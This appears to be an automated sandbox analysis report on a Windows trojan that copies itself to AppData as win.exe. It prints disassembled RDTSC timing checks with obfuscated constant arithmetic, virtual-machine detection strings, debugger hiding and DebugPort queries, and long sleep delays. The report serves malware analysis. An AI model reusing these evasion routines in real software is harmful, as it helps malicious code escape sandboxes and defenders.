Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A8640 second address: 00000000007A8717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A9ACC second address: 00000000007A9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C8016E2h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A900A second address: 00000000007A9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C8016E6h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A9059 second address: 00000000007A9059 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B9059 second address: 00000000020B9059 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A9138 second address: 00000000007A9138 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B9138 second address: 00000000020B9138 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A5970 second address: 00000000007A5970 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B5970 second address: 00000000020B5970 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A7FD6 second address: 00000000007A7FD6 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B7FD6 second address: 00000000020B7FD6 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A47AA second address: 00000000007A7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C37BB16h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C37BB12h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C37EF0Eh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B47AA second address: 00000000020B7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C8016E6h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C8016E2h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C804ADEh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A5549 second address: 00000000007A5549 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A4EE7 second address: 00000000007A4F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, E6694764h 0x00000010 xor eax, 84AE2B33h 0x00000015 xor eax, 41623A29h 0x0000001a sub eax, 23A5567Eh 0x0000001f push eax 0x00000020 mov eax, dword ptr [ebp+000001E4h] 0x00000026 push 9EE3AA3Fh 0x0000002b jmp 00007F430C8016E2h 0x0000002d test dx, dx 0x00000030 xor dword ptr [esp], F222664Ah 0x00000037 test dx, cx 0x0000003a xor dword ptr [esp], 30D813E0h 0x00000041 cmp bl, cl 0x00000043 xor dword ptr [esp], 5C19DF97h 0x0000004a test ecx, ecx 0x0000004c mov eax, ebp 0x0000004e cmp dx, dx 0x00000051 add eax, 00000100h 0x00000056 mov dword ptr [eax], C54B295Eh 0x0000005c pushad 0x0000005d lfence 0x00000060 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B5549 second address: 00000000020B5549 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B4EE7 second address: 00000000020B4F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, E6694764h 0x00000010 xor eax, 84AE2B33h 0x00000015 xor eax, 41623A29h 0x0000001a sub eax, 23A5567Eh 0x0000001f push eax 0x00000020 mov eax, dword ptr [ebp+000001E4h] 0x00000026 push 9EE3AA3Fh 0x0000002b jmp 00007F430C8016E2h 0x0000002d test dx, dx 0x00000030 xor dword ptr [esp], F222664Ah 0x00000037 test dx, cx 0x0000003a xor dword ptr [esp], 30D813E0h 0x00000041 cmp bl, cl 0x00000043 xor dword ptr [esp], 5C19DF97h 0x0000004a test ecx, ecx 0x0000004c mov eax, ebp 0x0000004e cmp dx, dx 0x00000051 add eax, 00000100h 0x00000056 mov dword ptr [eax], C54B295Eh 0x0000005c pushad 0x0000005d lfence 0x00000060 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A53C5 second address: 00000000007A53C5 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A57E9 second address: 00000000007A57E9 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 0000000000568640 second address: 0000000000568717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B53C5 second address: 00000000020B53C5 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B57E9 second address: 00000000020B57E9 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 0000000000568640 second address: 0000000000568717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C8016E2h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C801BD8h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C8016E2h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C8016E2h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 0000000000563399 second address: 0000000000563399 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 000000000056379A second address: 000000000056383C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov eax, dword ptr fs:[00000030h] 0x00000009 cmp bl, al 0x0000000b mov eax, dword ptr [eax+0Ch] 0x0000000e mov eax, dword ptr [eax+0Ch] 0x00000011 test cl, cl 0x00000013 test bl, cl 0x00000015 test edx, 7C659410h 0x0000001b mov ecx, dword ptr [edi+00000808h] 0x00000021 jmp 00007F430C801710h 0x00000023 mov dword ptr [eax+20h], ecx 0x00000026 mov esi, dword ptr [edi+00000800h] 0x0000002c mov dword ptr [eax+18h], esi 0x0000002f add esi, dword ptr [edi+00000850h] 0x00000035 mov dword ptr [eax+1Ch], esi 0x00000038 cmp dword ptr [ebp+70h], 01h 0x0000003c je 00007F430C8019DCh 0x00000042 jmp 00007F430C8016E6h 0x00000044 cmp edi, A946FD75h 0x0000004a pushad 0x0000004b mov edi, 000000E1h 0x00000050 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 0000000000563B90 second address: 0000000000563B90 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor byte ptr [esi+ecx], 00000011h 0x0000000f add byte ptr [esi+ecx], FFFFFF86h 0x00000013 sub byte ptr [esi+ecx], FFFFFFF1h 0x00000017 cmp ecx, 00000000h 0x0000001a jne 00007F430C37BADAh 0x0000001c test dx, ax 0x0000001f dec ecx 0x00000020 mov byte ptr [esi+ecx], 0000007Ah 0x00000024 pushad 0x00000025 lfence 0x00000028 rdtsc

Source: C:\Windows\SysWOW64\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Code function: 0_2_020B0816 rdtsc

0_2_020B0816

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Roaming\win.exe

Window / User API: threadDelayed 580

Jump to behavior

Source: C:\Users\user\AppData\Roaming\win.exe TID: 6324	Thread sleep count: 580 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe TID: 6324	Thread sleep time: -5800000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\win.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\win.exe	Last function: Thread delayed

Source: win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462534085.000000000084E000.00000004.00000020.sdmp, win.exe, 00000016.00000002.670720058.00000000008D7000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Code function: 0_2_020B0816 rdtsc

0_2_020B0816

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Code function: 0_2_020B5B95 LdrInitializeThunk,

0_2_020B5B95

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2F3E mov eax, dword ptr fs:[00000030h]	0_2_020B2F3E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3B6F mov eax, dword ptr fs:[00000030h]	0_2_020B3B6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3B60 mov eax, dword ptr fs:[00000030h]	0_2_020B3B60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3774 mov eax, dword ptr fs:[00000030h]	0_2_020B3774
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5843 mov eax, dword ptr fs:[00000030h]	0_2_020B5843
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8C44 mov eax, dword ptr fs:[00000030h]	0_2_020B8C44
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8C6D mov eax, dword ptr fs:[00000030h]	0_2_020B8C6D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B7C70 mov eax, dword ptr fs:[00000030h]	0_2_020B7C70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B813E mov eax, dword ptr fs:[00000030h]	0_2_020B813E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2F3E mov eax, dword ptr fs:[00000030h]	16_2_020B2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3B6F mov eax, dword ptr fs:[00000030h]	16_2_020B3B6F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3B60 mov eax, dword ptr fs:[00000030h]	16_2_020B3B60
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3774 mov eax, dword ptr fs:[00000030h]	16_2_020B3774
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5843 mov eax, dword ptr fs:[00000030h]	16_2_020B5843
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8C44 mov eax, dword ptr fs:[00000030h]	16_2_020B8C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8C6D mov eax, dword ptr fs:[00000030h]	16_2_020B8C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B7C70 mov eax, dword ptr fs:[00000030h]	16_2_020B7C70
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B813E mov eax, dword ptr fs:[00000030h]	16_2_020B813E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A7C70 mov eax, dword ptr fs:[00000030h]	17_2_007A7C70
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8C6D mov eax, dword ptr fs:[00000030h]	17_2_007A8C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5843 mov eax, dword ptr fs:[00000030h]	17_2_007A5843
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8C44 mov eax, dword ptr fs:[00000030h]	17_2_007A8C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A813E mov eax, dword ptr fs:[00000030h]	17_2_007A813E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3774 mov eax, dword ptr fs:[00000030h]	17_2_007A3774
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3B6F mov eax, dword ptr fs:[00000030h]	17_2_007A3B6F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3B60 mov eax, dword ptr fs:[00000030h]	17_2_007A3B60
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2F3E mov eax, dword ptr fs:[00000030h]	17_2_007A2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2F3E mov eax, dword ptr fs:[00000030h]	18_2_020B2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3B6F mov eax, dword ptr fs:[00000030h]	18_2_020B3B6F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3B60 mov eax, dword ptr fs:[00000030h]	18_2_020B3B60
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3774 mov eax, dword ptr fs:[00000030h]	18_2_020B3774
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5843 mov eax, dword ptr fs:[00000030h]	18_2_020B5843
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8C44 mov eax, dword ptr fs:[00000030h]	18_2_020B8C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8C6D mov eax, dword ptr fs:[00000030h]	18_2_020B8C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B7C70 mov eax, dword ptr fs:[00000030h]	18_2_020B7C70
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B813E mov eax, dword ptr fs:[00000030h]	18_2_020B813E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00563B60 mov eax, dword ptr fs:[00000030h]	22_2_00563B60
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568C44 mov eax, dword ptr fs:[00000030h]	22_2_00568C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565843 mov eax, dword ptr fs:[00000030h]	22_2_00565843
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00567C70 mov eax, dword ptr fs:[00000030h]	22_2_00567C70
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568C6D mov eax, dword ptr fs:[00000030h]	22_2_00568C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056813E mov eax, dword ptr fs:[00000030h]	22_2_0056813E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00563774 mov eax, dword ptr fs:[00000030h]	22_2_00563774
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00563B6F mov eax, dword ptr fs:[00000030h]	22_2_00563B6F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00562F3E mov eax, dword ptr fs:[00000030h]	22_2_00562F3E
